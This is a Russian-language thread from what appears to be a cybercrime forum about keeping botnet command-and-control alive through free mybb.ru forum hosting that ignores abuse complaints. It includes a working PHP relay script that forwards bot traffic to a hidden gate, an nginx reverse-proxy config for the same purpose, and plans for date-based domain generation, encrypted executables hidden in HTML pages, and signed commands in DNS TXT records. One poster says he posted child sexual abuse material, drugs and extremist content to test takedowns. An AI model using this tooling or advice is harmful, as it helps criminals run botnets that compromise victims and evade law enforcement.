• XSS.stack #1 – первый литературный журнал от юзеров форума

Бесплатные хостинги и ботнет

Отслеживать
Quake3

Quake3

TPU unit
Забанен
Регистрация
03.11.2010
Сообщения
4 529
Решения
4
Реакции
5 305
Депозит
0.046
Пожалуйста, обратите внимание, что пользователь заблокирован
Уже давно есть у меня одна идея касаемо защиты ботнета; Многие ее могут воспринять как бред, но тем не менее, напишу.

Есть такая вещь, как бесплатный хостинг-конструктор. Много кто еще в старые времена пользовался народ.ру, и т.п. , и был неприятно огорчен, что подобные сайты на фрихостах лочат от малейшей абузы или заскока в голове у сис.админа. Но есть и другие хостинги, например конструктор форумов _mybb.ru . Обычный говноскрипт, создающий форумы на основе модифицированного punbb. Но суть в другом - техподдержке и администрации этого хостинга абсолютно пофиг на все жалобы. У меня была ситуация, когда надо было ликвидировать заброшенный(!) форум на их хостинге - никакой спам запрещенным контентом не помог, хотя там нарушений было выше крыши + я еще наспамил разной ерундой. Они реагируют только на уголовное дело РФ, а все иные жалобы пох, ведь им выгодно - чем больше говнофорумов, тем больше денег с показов рекламы.

Так вот, к чему я веду - что если использовать сайты этого хостинга как "прокладки", т.е. публиковать там линки на скачивание (ес-но шифрованные), или еще что нибудь. Тут два варианта - либо регить новые форумы у них, либо прятать шифрованный текст на каком-нибудь крупном форуме на этом движке. Уверен, что это отобьет большинство абуз, т.к. если они не реагируют на прямые нарушения, вида экстремизма и наркоты на сайте, то какие-то сообщения от аверов вообще пошлют подальше. Это все будет базироваться как домены третьего уровня на ихнем поддомене, который опять же могут закрыть только по судебному решению РФ.

В качестве хостинга под боты, тем более на больших нагрузках, я эту тему ес-но не пробовал (по понятным причинам отсутствия ботнета). Но думаю, что прокатит, особенно если как-то распределять нагрузку, т.е. не больше нескольких тысяч посетителей на 1 форум (а то заблокируют ботов антиддосом).

p.s. в поисковики эти сайты попадают не всегда, поэтому тут нужны прямые линки/генерация доменов.
 
На trojanforge видел вчера один интересный пхп-кодес, который выступает ПРОКЛАДКОЙ между ботом и гейтом.
Идея какова: бот стучит на прокладку, прокладка перенаправляет запросы на оригинальный гейт, также производит чтение с гейта, соответственно бот принимает команды. Если и прийдет абуза, и залочат наш хост, достаточно будет заменить адрес в прокладке на новый хост.. собсно толком пока не смог понять тонкостей реализации данной идеи, но с виду теории, она эффектна.

Код: 
<?php
$url = "http://server-to-redirect.com/gate.php";

@error_reporting(0); @set_time_limit(0);

$url = @parse_url($url);
if(!isset($url['port']))$url['port'] = 80; 
if(($real_server = @fsockopen($url['host'], $url['port'])) === false)die('E1');


if(($data = @file_get_contents('php://input')) === false)$data = '';

$request  = "POST {$url['path']}?ip=".urlencode($_SERVER['REMOTE_ADDR'])." HTTP/1.0\r\n";
$request .= "Host: {$url['host']}\r\n";

if(!empty($_SERVER['HTTP_USER_AGENT']))$request .= "User-Agent: {$_SERVER['HTTP_USER_AGENT']}\r\n";

$request .= "X-Forwarded-For: " . $_SERVER ["REMOTE_ADDR"] . "\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Content-Length: ".strlen($data)."\r\n";
$request .= "Connection: Close\r\n";

fwrite($real_server, $request."\r\n".$data);


$result = '';
while(!feof($real_server))$result .= fread($real_server, 1024);
fclose($real_server);

echo substr($result, strpos($result, "\r\n\r\n") + 4);
?>
 
Пожалуйста, обратите внимание, что пользователь заблокирован
собсно толком пока не смог понять тонкостей реализации данной идеи
Как я понимаю, скрипт берет запрос, который ему отправили (читает враппер php://input ), и отправляет на гейт пост-запросом. Гейт, получив запрос, должен вывести данные ответа, которые этот же скрипт парсит и выводит в браузер/боту.

Но на этих форумах, что я упоминал выше, нет поддержки РНР, есть только жаваскрипт. Соответственно,проблема в том, что боты не поддерживают яваскрипт (может есть какие-то способы работы с ним через СОМ, я хз).
 
Wolfomeo
Нечасто дают fsockopen на обычных хостингах. Мне кажется прокладку как раз быстрее залочат (несмотря на то, что она якобы ничего не нарушает), не?

Quake3
https://xss.pro/index.php?topic=22825 в топе проскакивало нечто похожее :)
 
Можно еще по дате (или другому общедоступному параметру), генерировать поддомен. По надобности регнул, боты считали команду, и всё: дешево, надежно и практично :)

1-3к ботов, с интервалом в минут 30-60, и все ок.
 
А не проще купить простую впску для прокладки, не рискуя потерять ботнет?
и поставить туда нгинкс с таким конфигом:


Код: 
server {

    location / {
     proxy_pass  http://1.2.3.4  #наш белый сервер;
     proxy_redirect off;
     proxy_buffering off;
     proxy_set_header        Host            $host;
     proxy_set_header        X-Real-IP       $remote_addr;
     proxy_set_header        X-Forwarded-For $proxy_add_x_forwarded_for;


}
}

есть и немало админов которые могут включить tcpdump и прослушать ваш трафф, если он не SSL на фри хостах.


:thumbsup:
 
Нечасто дают fsockopen на обычных хостингах. Мне кажется прокладку как раз быстрее залочат (несмотря на то, что она якобы ничего не нарушает), не?

Потестил на андромеда-лоадер, проснифал, тот хост на котором стоит прокладка - в логах нету <= раз такой расклад, то уж можно как-нибудь разжится на пару шекелей, и прикупить сервак с нужным конфигом)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
DASM32
Да, идею с аватарками я взял у Krazz, у меня была мысль просто добавлять в подпись или еще куда шифрованное сообщение.
А по поводу впс и так далее - да, все это можно сделать. Но у меня были мысли попробовать с фришными форумами, т.к. они:
1. бесплатные.
Никаких затрат на регу, даже на антикапчу не надо тратится; Соответственно, можно нарегить хоть тысячи доменов.
2. пофигизм тех.поддержки.
Опять же, все это добро, если подойти с умом, и напостить туда хоть 1-2 темы (т.к. вроде неактив удаляется за месяц), будет висеть, пока не заведут в РФ УД. А поскольку вероятность сего крайне низкая (разве что для мега-ботнетов), висеть такое дело может очень долго.

Конечно же, я не считаю целесообразным держать все яйца в 1 корзине, и полагатся только на этот хостинг. Мало ли как может быть. Но как резервный гейт в случае утраты основного, или еще для каких-то целей вполне можно попробовать использовать. Опять же, имхо. :yinyang:
 
Quake3
Шифрованное будет бросаться в глаза. Стеганографируй, используй общеупотребительные слова и т.д. :)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Ради интереса провел эксперимент - зарегил домены на 1 из говнофорумов, разместил цп, наркоту, экстремизм и так далее. Написал через неделю (как проиндексировалось) жалобы везде (админам хостинга, фскн, роскомнадзор). И никто эти домены не закрывает, с ноября все висит и работает.

И зачем китайские впс? ;) Если уж такое явное нарушение висит, то прокладка для ботнета (на случай блока основного домена - перекинуть ботов на новый) тем более проживет вечно. Прикол в том, что регистратор видимо не может отключить поддомен вида xxxx.mybb.ru, а техподдержке самого майбб плевать на все.

Кроме того, можно в хтмл страницы размещать зашифрованный код ехе файлов, и пусть боты оттуда их качают.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Еще варианты в догонку - можно спокойно нужные команды размещать в txt-записях домена (да и в mx- и в любых других, хоть в cname). Тогда на самом домене вообще ничего не будет.

Ограничения на txt-запись - запись может состоять только из букв латинского алфавита, цифр, пробелов и символов . , ; : - = " / ~ ?
Про ограничения по размеру гугл ничего не говорит, значит, теоретически, txt-запись следует еще и подписывать своим закрытым ключом (и проверять на стороне бота).
Это поможет предотвратить угон бота через перехват предстоящих доменов (мы ведь предполагаем что отреверсят?)

Или как вариант, команду хранить в cname (приводя ее к виду домена), а подпись хранить в txt-записи. Тогда человек несведущий, просто заметит обращение к несуществующему домену, и все.
 
Apocalypse, у домена не будет айпишника даже, он будет просто домен с парой тхт записей, к тому же ав не много в трафе дабы они мешали ботам. домен конечно локнут когда напишут абузу и все в ней расскажут, но это ж надо писать, а для этого проанализировать бота полностью.

Aels, там с ддос ботами поступали, один домен и все
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх